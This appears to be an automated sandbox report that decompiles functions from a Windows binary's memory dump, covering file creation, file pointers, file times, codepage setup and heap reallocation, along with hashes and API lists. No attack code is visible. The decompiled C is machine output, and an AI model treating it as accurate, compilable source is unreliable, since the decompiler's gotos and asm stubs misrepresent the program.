                                            0x00c313e2
                                            0x00c313e5
                                            0x00c313eb
                                            0x00c313f1
                                            0x00c313f3
                                            0x00c31418
                                            0x00c313f5
                                            0x00c313fa
                                            0x00c31400
                                            0x00c31403
                                            0x00c31409
                                            0x00c31414
                                            0x00c3140b
                                            0x00c3140d
                                            0x00c3140d
                                            0x00c31409
                                            0x00c3141b
                                            0x00c31427
                                            0x00c3142e
                                            0x00c31435
                                            0x00c3143e
                                            0x00c31449
                                            0x00c31453
                                            0x00c31459
                                            0x00c3145f
                                            0x00c31465
                                            0x00c3146b
                                            0x00c31471
                                            0x00c31477
                                            0x00c3147e
                                            0x00c31484
                                            0x00c3148a
                                            0x00c31490
                                            0x00c31496
                                            0x00c3149c
                                            0x00c314ab
                                            0x00c314ba
                                            0x00c314c5
                                            0x00c314cd
                                            0x00c314d3
                                            0x00c314d9
                                            0x00c314df
                                            0x00c314e5
                                            0x00c314eb
                                            0x00c314f1
                                            0x00c314fa
                                            0x00c31500
                                            0x00c31506
                                            0x00c3150e
                                            0x00c31518

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C31382
                                              • Part of subcall function 00C35E99: __EH_prolog.LIBCMT ref: 00C35E9E
                                              • Part of subcall function 00C3C4CA: __EH_prolog.LIBCMT ref: 00C3C4CF
                                              • Part of subcall function 00C3C4CA: new.LIBCMT ref: 00C3C512
                                              • Part of subcall function 00C3C4CA: new.LIBCMT ref: 00C3C536
                                            • new.LIBCMT ref: 00C313FA
                                              • Part of subcall function 00C3AD1B: __EH_prolog.LIBCMT ref: 00C3AD20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID:
                                            • API String ID: 3519838083-0
                                            • Opcode ID: 5ab2f9fb0eea3ac8badc943cff724f55c2bb9dfc99c739a44ddec10acff204e3
                                            • Instruction ID: 918339fe0500492804de38d7944189b21577afefd2c57c051cbd45461c1f2d76
                                            • Opcode Fuzzy Hash: 5ab2f9fb0eea3ac8badc943cff724f55c2bb9dfc99c739a44ddec10acff204e3
                                            • Instruction Fuzzy Hash: A24125B0905B409EE724DF798485AE6FBE5FF28310F544A2ED5EE83282CB326554CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5A6B2, Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00C5A6B2(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00C58516(__ebx, __ecx, __edx);
				E00C5A7D1(__ebx, __ecx, __edx, _t81);
				_t31 = E00C5A446(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00C57A8A(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00C5A873(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00C57847();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xc6db20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xc6db20) {
								E00C57A50( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xc6dda0 & 0x00000001;
							if(( *0xc6dda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00C5A31C(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xc6dd40; // 0x1192448
									 *0xc6d814 = _t44;
								}
							}
						}
						L6:
						E00C57A50(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00C57ECC())) = 0x16;
						goto L5;
					}
				}
			}


















                                            0x00c5a6b2
                                            0x00c5a6bf
                                            0x00c5a6c2
                                            0x00c5a6ca
                                            0x00c5a6d3
                                            0x00c5a6d6
                                            0x00c5a6dc
                                            0x00000000
                                            0x00c5a6de
                                            0x00c5a6e2
                                            0x00c5a6ef
                                            0x00c5a6f1
                                            0x00c5a6f5
                                            0x00c5a6f7
                                            0x00c5a727
                                            0x00c5a727
                                            0x00000000
                                            0x00c5a6f9
                                            0x00c5a706
                                            0x00c5a70c
                                            0x00c5a70f
                                            0x00c5a714
                                            0x00c5a718
                                            0x00c5a71a
                                            0x00c5a739
                                            0x00c5a73d
                                            0x00c5a73f
                                            0x00c5a73f
                                            0x00c5a74a
                                            0x00c5a74e
                                            0x00c5a74f
                                            0x00c5a751
                                            0x00c5a754
                                            0x00c5a75b
                                            0x00c5a760
                                            0x00c5a765
                                            0x00c5a75b
                                            0x00c5a766
                                            0x00c5a76c
                                            0x00c5a771
                                            0x00c5a773
                                            0x00c5a776
                                            0x00c5a779
                                            0x00c5a780
                                            0x00c5a782
                                            0x00c5a789
                                            0x00c5a78e
                                            0x00c5a797
                                            0x00c5a79c
                                            0x00c5a7a2
                                            0x00c5a7a4
                                            0x00c5a7a9
                                            0x00c5a7a9
                                            0x00c5a7a2
                                            0x00c5a789
                                            0x00c5a729
                                            0x00c5a72a
                                            0x00000000
                                            0x00c5a71c
                                            0x00c5a721
                                            0x00000000
                                            0x00c5a721
                                            0x00c5a71a

                                            APIs
                                              • Part of subcall function 00C58516: GetLastError.KERNEL32(?,?,00C53394,?,?,?,00C52E0F,00000050), ref: 00C5851A
                                              • Part of subcall function 00C58516: _free.LIBCMT ref: 00C5854D
                                              • Part of subcall function 00C58516: SetLastError.KERNEL32(00000000), ref: 00C5858E
                                              • Part of subcall function 00C58516: _abort.LIBCMT ref: 00C58594
                                              • Part of subcall function 00C5A7D1: _abort.LIBCMT ref: 00C5A803
                                              • Part of subcall function 00C5A7D1: _free.LIBCMT ref: 00C5A837
                                              • Part of subcall function 00C5A446: GetOEMCP.KERNEL32(00000000,?,?,00C5A6CF,?), ref: 00C5A471
                                            • _free.LIBCMT ref: 00C5A72A
                                            • _free.LIBCMT ref: 00C5A760
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _free$ErrorLast_abort
                                            • String ID:
                                            • API String ID: 2991157371-0
                                            • Opcode ID: 47f040e57376406b3e89f2d1e24782c08e053cb50fad6ec6d08abeba536be024
                                            • Instruction ID: e04138dcb000d1e215b4b855aeb4fd2a6bb6f02ced5daec55405bba98aa81f2b
                                            • Opcode Fuzzy Hash: 47f040e57376406b3e89f2d1e24782c08e053cb50fad6ec6d08abeba536be024
                                            • Instruction Fuzzy Hash: C3315E39D04104AFDB10EF6AD440B6D77F0DF443A2F254299EC145B2A1EB719EC8DB59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39528, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C39528(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E00C4D940();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x18) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E00C3B927(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E00C3B32C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x12)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E00C3FAB1(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}












                                            0x00c3952d
                                            0x00c39533
                                            0x00c39540
                                            0x00c39542
                                            0x00c39548
                                            0x00c39556
                                            0x00c39556
                                            0x00c39550
                                            0x00c39550
                                            0x00c39550
                                            0x00c39560
                                            0x00c39575
                                            0x00c3957e
                                            0x00c39584
                                            0x00c3958e
                                            0x00000000
                                            0x00c39590
                                            0x00c39590
                                            0x00c39594
                                            0x00c39596
                                            0x00c39596
                                            0x00c3959c
                                            0x00c3959c
                                            0x00c3959c
                                            0x00c395a0
                                            0x00c395a0
                                            0x00c395b0
                                            0x00c395b6
                                            0x00c395b6
                                            0x00c395bd
                                            0x00c395eb
                                            0x00c395eb
                                            0x00c395fd
                                            0x00c39602
                                            0x00c39605
                                            0x00c3961e

                                            APIs
                                            • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00C39BF3,?,?,00C376AC), ref: 00C395B0
                                            • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00C39BF3,?,?,00C376AC), ref: 00C395E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: f124c5ea444fdd8893a3919f217dead28fa072cbe613793a2bfee4779ae8b893
                                            • Instruction ID: 85628279bd98735f5be1a87ce0f161c7c62723d1f1c995998f00253e92182589
                                            • Opcode Fuzzy Hash: f124c5ea444fdd8893a3919f217dead28fa072cbe613793a2bfee4779ae8b893
                                            • Instruction Fuzzy Hash: D02135B1418748AFE7318F55CC45BA777E8EB49364F004A2DF5E6821D2C3B4AD88DB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39A7E, Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E00C39A7E(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_a4 = 0;
				} else {
					_a4 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E00C4082F(_t51, _t57,  &_v24);
				}
				if(_a4 != 0) {
					E00C4082F(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E00C4082F(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}















                                            0x00c39a7e
                                            0x00c39a84
                                            0x00c39a8d
                                            0x00c39a98
                                            0x00c39a98
                                            0x00c39a9e
                                            0x00c39aa4
                                            0x00c39aa7
                                            0x00c39ab4
                                            0x00c39ab0
                                            0x00c39ab0
                                            0x00c39ab0
                                            0x00c39ab6
                                            0x00c39ab7
                                            0x00c39abb
                                            0x00c39ac1
                                            0x00c39ace
                                            0x00c39ace
                                            0x00c39ac3
                                            0x00c39ac8
                                            0x00c39acc
                                            0x00000000
                                            0x00000000
                                            0x00c39acc
                                            0x00c39ad3
                                            0x00c39ad9
                                            0x00c39ae3
                                            0x00c39ae3
                                            0x00c39ae7
                                            0x00c39aee
                                            0x00c39aee
                                            0x00c39af8
                                            0x00c39b01
                                            0x00c39b01
                                            0x00c39b09
                                            0x00c39b12
                                            0x00c39b12
                                            0x00c39b22
                                            0x00c39b30
                                            0x00c39b40
                                            0x00c39b48
                                            0x00c39b54

                                            APIs
                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00C3738C,?,?,?), ref: 00C39A98
                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00C39B48
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$BuffersFlushTime
                                            • String ID:
                                            • API String ID: 1392018926-0
                                            • Opcode ID: 9ef50f1c07a61bc7514b819bdf875fea3b6583ddee86e7905d489e0c0c5b951b
                                            • Instruction ID: 6564ea459abb0c49ff7c674248daa98fe548427b1a7f30b68318088844f67176
                                            • Opcode Fuzzy Hash: 9ef50f1c07a61bc7514b819bdf875fea3b6583ddee86e7905d489e0c0c5b951b
                                            • Instruction Fuzzy Hash: 3E21D331268285AFC710DE24C991AABBBE4FF51704F040A1CB891C7182D7B5EE08EBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C59990, Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E00C59990(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xc907b8 + _a4 * 4;
				_t27 =  *0xc6d668; // 0x13bcba52
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xc6d668; // 0x13bcba52
							goto L13;
						}
						 *_t20 = E00C4DB10(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00C59A2C( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xc6d668; // 0x13bcba52
						goto L7;
					}
					_t27 =  *0xc6d668; // 0x13bcba52
					goto L8;
				}
				L2:
				return _t33;
			}










                                            0x00c5999b
                                            0x00c599a4
                                            0x00c599aa
                                            0x00c599b4
                                            0x00c599b6
                                            0x00c599ba
                                            0x00c59a25
                                            0x00000000
                                            0x00c59a25
                                            0x00c599be
                                            0x00c599c4
                                            0x00c599ca
                                            0x00c599e6
                                            0x00c599e6
                                            0x00c599e8
                                            0x00c599ea
                                            0x00c59a15
                                            0x00c59a17
                                            0x00c59a1f
                                            0x00c59a23
                                            0x00000000
                                            0x00c59a23
                                            0x00c599f6
                                            0x00c599fa
                                            0x00c59a0f
                                            0x00000000
                                            0x00c59a0f
                                            0x00c59a03
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c599cc
                                            0x00c599cc
                                            0x00c599ce
                                            0x00c599d6
                                            0x00000000
                                            0x00000000
                                            0x00c599d8
                                            0x00c599de
                                            0x00000000
                                            0x00000000
                                            0x00c599e0
                                            0x00000000
                                            0x00c599e0
                                            0x00c59a07
                                            0x00000000
                                            0x00c59a07
                                            0x00c599c0
                                            0x00000000

                                            APIs
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C599F0
                                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C599FD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressProc__crt_fast_encode_pointer
                                            • String ID:
                                            • API String ID: 2279764990-0
                                            • Opcode ID: 7750ea92bbabe9a2d91de5542bf67e08a6155b8463d06fafdae91923d0cc8fd3
                                            • Instruction ID: 72b1e2d7b3bca246f32d204630da5af50fa2e491cc676989e85d6579c9c737de
                                            • Opcode Fuzzy Hash: 7750ea92bbabe9a2d91de5542bf67e08a6155b8463d06fafdae91923d0cc8fd3
                                            • Instruction Fuzzy Hash: 33115C3BB00121CB9F31DE2ADC40A9E7395EB8132071606A0FC29EB294D730ED85D7E5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39B57, Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E00C39B57() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x14)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E00C36DE2(0xc700e0, 0xc700e0, _t34 + 0x1e);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x14)) == 0) {
					return _t22;
				}
				E00C36DE2(0xc700e0, 0xc700e0, _t34 + 0x1e);
				goto L3;
			}













                                            0x00c39b5b
                                            0x00c39b5d
                                            0x00c39b68
                                            0x00c39b7b
                                            0x00c39b7b
                                            0x00c39b8d
                                            0x00c39b93
                                            0x00c39b97
                                            0x00c39bb4
                                            0x00c39bba
                                            0x00c39bbf
                                            0x00c39bc1
                                            0x00000000
                                            0x00c39ba3
                                            0x00c39ba7
                                            0x00c39bd0
                                            0x00c39bc4
                                            0x00000000
                                            0x00c39bc4
                                            0x00c39baf
                                            0x00000000
                                            0x00c39baf
                                            0x00c39b97
                                            0x00c39b6e
                                            0x00000000
                                            0x00c39bcc
                                            0x00c39b76
                                            0x00000000

                                            APIs
                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00C39B8D
                                            • GetLastError.KERNEL32 ref: 00C39B99
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorFileLastPointer
                                            • String ID:
                                            • API String ID: 2976181284-0
                                            • Opcode ID: cf8cc4e543f4d8995c50c7b8855299067f65f7ff1c4e90a06425d8b31a216639
                                            • Instruction ID: 32474a40ef2452be6bcd6f6375842ddad8c92b14170dc78208420ea945912abc
                                            • Opcode Fuzzy Hash: cf8cc4e543f4d8995c50c7b8855299067f65f7ff1c4e90a06425d8b31a216639
                                            • Instruction Fuzzy Hash: 850192713102006BE7349E29EC84B6AF6DEEB85318F14853EB152C26C0CAB4D908C621
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39903, Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00C39903(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
				long _t14;
				void* _t17;
				intOrPtr* _t19;
				long _t21;
				void* _t23;
				long _t25;
				long _t28;
				long _t31;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
					L13:
					return 1;
				}
				_t28 = _a4;
				_t25 = _a8;
				_t31 = _t25;
				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
					_t21 = _a12;
				} else {
					_t21 = _a12;
					if(_t21 != 0) {
						if(_t21 != 1) {
							_t17 = E00C396E1(_t23);
						} else {
							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
						}
						_t28 = _t28 + _t17;
						asm("adc edi, edx");
						_t21 = 0;
					}
				}
				_a12 = _t25;
				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}











                                            0x00c39907
                                            0x00c3990d
                                            0x00c39972
                                            0x00000000
                                            0x00c39972
                                            0x00c39910
                                            0x00c39914
                                            0x00c39917
                                            0x00c39919
                                            0x00c39943
                                            0x00c39921
                                            0x00c39921
                                            0x00c39926
                                            0x00c3992d
                                            0x00c39936
                                            0x00c3992f
                                            0x00c39931
                                            0x00c39931
                                            0x00c3993b
                                            0x00c3993d
                                            0x00c3993f
                                            0x00c3993f
                                            0x00c39926
                                            0x00c39948
                                            0x00c39957
                                            0x00c39962
                                            0x00000000
                                            0x00c3996e
                                            0x00000000
                                            0x00c3996e

                                            APIs
                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00C39957
                                            • GetLastError.KERNEL32 ref: 00C39964
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorFileLastPointer
                                            • String ID:
                                            • API String ID: 2976181284-0
                                            • Opcode ID: 4bb533fb6f3b24d7b083cd907e77367f9f90d5678cc71ef993dff418e21548f8
                                            • Instruction ID: fb527542eaa7202894ba84a08f2769f952d8d6b15c25547d4c7443c470f98f50
                                            • Opcode Fuzzy Hash: 4bb533fb6f3b24d7b083cd907e77367f9f90d5678cc71ef993dff418e21548f8
                                            • Instruction Fuzzy Hash: C101B1322203059B8B18DE269D84BBF7769EF41330F09422DE93E8B291DBB0DD119660
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C57B78, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E00C57B78(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0xc90874, 0, _t14, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00C57906();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00C56763(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00C57ECC())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00C57A50(_t14);
					goto L6;
				}
				_t9 = E00C57A8A(__ecx, _a8); // executed
				return _t9;
			}










                                            0x00c57b78
                                            0x00c57b78
                                            0x00c57b7e
                                            0x00c57b83
                                            0x00c57b91
                                            0x00c57b94
                                            0x00c57b96
                                            0x00c57ba1
                                            0x00c57ba4
                                            0x00c57bcb
                                            0x00c57bd5
                                            0x00c57bdb
                                            0x00c57bdd
                                            0x00000000
                                            0x00000000
                                            0x00c57bbc
                                            0x00c57bbe
                                            0x00000000
                                            0x00000000
                                            0x00c57bc1
                                            0x00c57bc6
                                            0x00c57bc7
                                            0x00c57bc9
                                            0x00000000
                                            0x00000000
                                            0x00c57bc9
                                            0x00c57bb3
                                            0x00000000
                                            0x00c57bb3
                                            0x00c57ba6
                                            0x00c57bab
                                            0x00c57bb1
                                            0x00c57bb1
                                            0x00c57bb1
                                            0x00000000
                                            0x00c57bb1
                                            0x00c57b99
                                            0x00000000
                                            0x00c57b9e
                                            0x00c57b88
                                            0x00000000

                                            APIs
                                            • _free.LIBCMT ref: 00C57B99
